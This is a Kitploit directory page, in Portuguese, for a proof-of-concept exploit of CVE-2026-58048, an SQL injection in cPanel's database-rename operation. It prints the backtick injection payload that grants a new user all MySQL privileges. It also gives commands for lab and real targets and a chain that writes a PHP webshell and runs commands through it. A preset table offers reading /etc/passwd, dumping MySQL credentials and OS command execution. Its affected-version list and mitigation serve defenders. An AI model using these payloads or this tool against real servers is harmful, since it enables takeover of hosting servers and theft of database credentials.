Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
POC-CVE-2026-58048 — Projeto de pesquisa em segurança | Kitploit
Ferramentas/GitHubGitHub/imbas007/poc-cve-2026-58048
Escalada de PrivilégiosExploraçãoExploração de Aplicações WebSegurança WebTestes de PenetraçãoSegurança de Banco de DadosLabs e Prática
GitHubimbas007/poc-cve-2026-58048

POC-CVE-2026-58048

Projeto de pesquisa em segurança

Ver Repositório
16há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-58048

CVSS 4.0: 9.4 (Crítico) | CWE-89: Injeção de SQL | NVD

Usuário cPanel autenticado → SQL arbitrário como root do MySQL via renomeação de banco de dados. O cPanel preserva incorretamente o sql_mode da sessão do usuário (ANSI_QUOTES) ao executar operações de renomeação como root — uma crase no nome do banco de dados escapa do identificador e injeta SQL.

root@kitploit:~
name: db`; GRANT ALL ON *.* TO 'rce'@'%' IDENTIFIED BY 'pwned!'; -- 

Início Rápido (Laboratório Docker)

root@kitploit:~
pip install -r requirements.txt

python3 simulate.py start   # start lab (MariaDB:13306, cPanel API:18080, Apache:18081)
python3 poc.py -t http://localhost:18080 --mysql-port 13306 --payload admin-user --verify
python3 simulate.py stop

O modo de laboratório é detectado automaticamente — não é necessária a flag --lab.

Alvo cPanel real

root@kitploit:~
python3 poc.py -t https://cpanel.example.com:2083 -u user -p 'pass' \
    --payload admin-user --verify

Predefinições de Payload

SQL personalizado: --inject "GRANT ALL ON *.* TO 'x'@'%' IDENTIFIED BY 'y'"

Cadeia RCE Completa (Laboratório)

root@kitploit:~
# 1. Write shell to web root
python3 poc.py -t http://localhost:18080 --mysql-port 13306 \
    --payload webshell --shell /var/www/html/shell.php

# 2. Execute commands via HTTP!
curl "http://localhost:18081/shell.php?0=id"

Versões Afetadas

cPanel < 11.110.0.137, 11.118.0.71, 11.126.0.78, 11.134.0.48, 11.136.0.32; WP Squared < 11.138.1.6

Mitigação: atualize ou revogue o recurso MySQL dos usuários do cPanel.

Referências

  • cPanel Advisory
  • SecurityOnline

Apenas para testes de segurança autorizados e educação.

Baixar ferramenta
PresetEfeito
admin-user (padrão)Cria usuário admin rce do MySQL
compact-adminPayload admin curto (<64 caracteres — cabe no limite de nome do cPanel real; verifique: r/p)
webshellEscreve shell PHP via INTO OUTFILE (--shell /var/www/html/shell.php)
read-fileLê arquivo do servidor via LOAD_FILE (--file /etc/passwd)
dump-usersExtrai todas as credenciais do MySQL para pwn.users
udf-rceExecução de comandos do SO via UDF